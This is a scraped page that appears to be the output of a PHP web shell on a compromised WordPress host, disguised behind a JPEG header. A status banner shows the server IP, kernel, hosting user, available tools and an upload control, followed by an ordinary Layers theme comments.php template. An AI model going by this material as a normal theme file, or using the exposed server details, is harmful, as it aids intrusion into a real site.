????JFIF??x?x????'
| Server IP : 172.67.174.47  /  Your IP : 216.73.216.83 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /././home/./tempvsty/./pontiacques.org/wp-content/themes/layerswp/ | 
| Upload File : | 
<?php
/**
 * This template is used for displaying comments in posts
 *
 * @package Layers
 * @since Layers 1.0.0
 */
do_action('layers_before_comments'); ?>
<div id="comments" <?php echo layers_wrapper_class( 'comment_container', 'push-top-large' ); ?>>
	<?php if ( have_comments() ) { ?>
		<div class="section-title small">
			<h3 class="heading comment-title">
				<?php
					printf( _n( 'One Comment on “%2$s”', '%1$s Comments on “%2$s”', get_comments_number(), LAYERS_THEME_SLUG ),
						number_format_i18n( get_comments_number() ),
						'<span>' . get_the_title() . '</span>' );
				?>
			</h3>
		</div>
		<div <?php layers_wrapper_class( 'comment_list', 'comment-list clearfix' ); ?>>
			<?php wp_list_comments( array( 'callback' => 'layers_comment', 'style' => 'div' ) ); ?>
		</div><!-- .commentlist -->
		<?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) { // are there comments to navigate through ?>
			<nav id="comment-nav-below" class="pagination" role="navigation">
				<div class="previous"><?php previous_comments_link( __( '←' , 'layerswp' ) ); ?></div>
				<div class="next"><?php next_comments_link( __( '→' , 'layerswp' ) ); ?></div>
			</nav>
		<?php } // check for comment navigation ?>
	<?php }
	/* If there are no comments and comments are closed, let's leave a note.
	 * But we only want the note on posts and pages that had comments in the first place.
	 */
	if ( !is_page() && ! comments_open() && get_comments_number() ) : ?>
		<p class="nocomments"><?php _e( 'Comments are closed.' , 'layerswp' ); ?></p>
	<?php endif; ?>
	<?php comment_form();  ?>
</div><!-- #comments .comments-area -->
<?php do_action('layers_after_comments');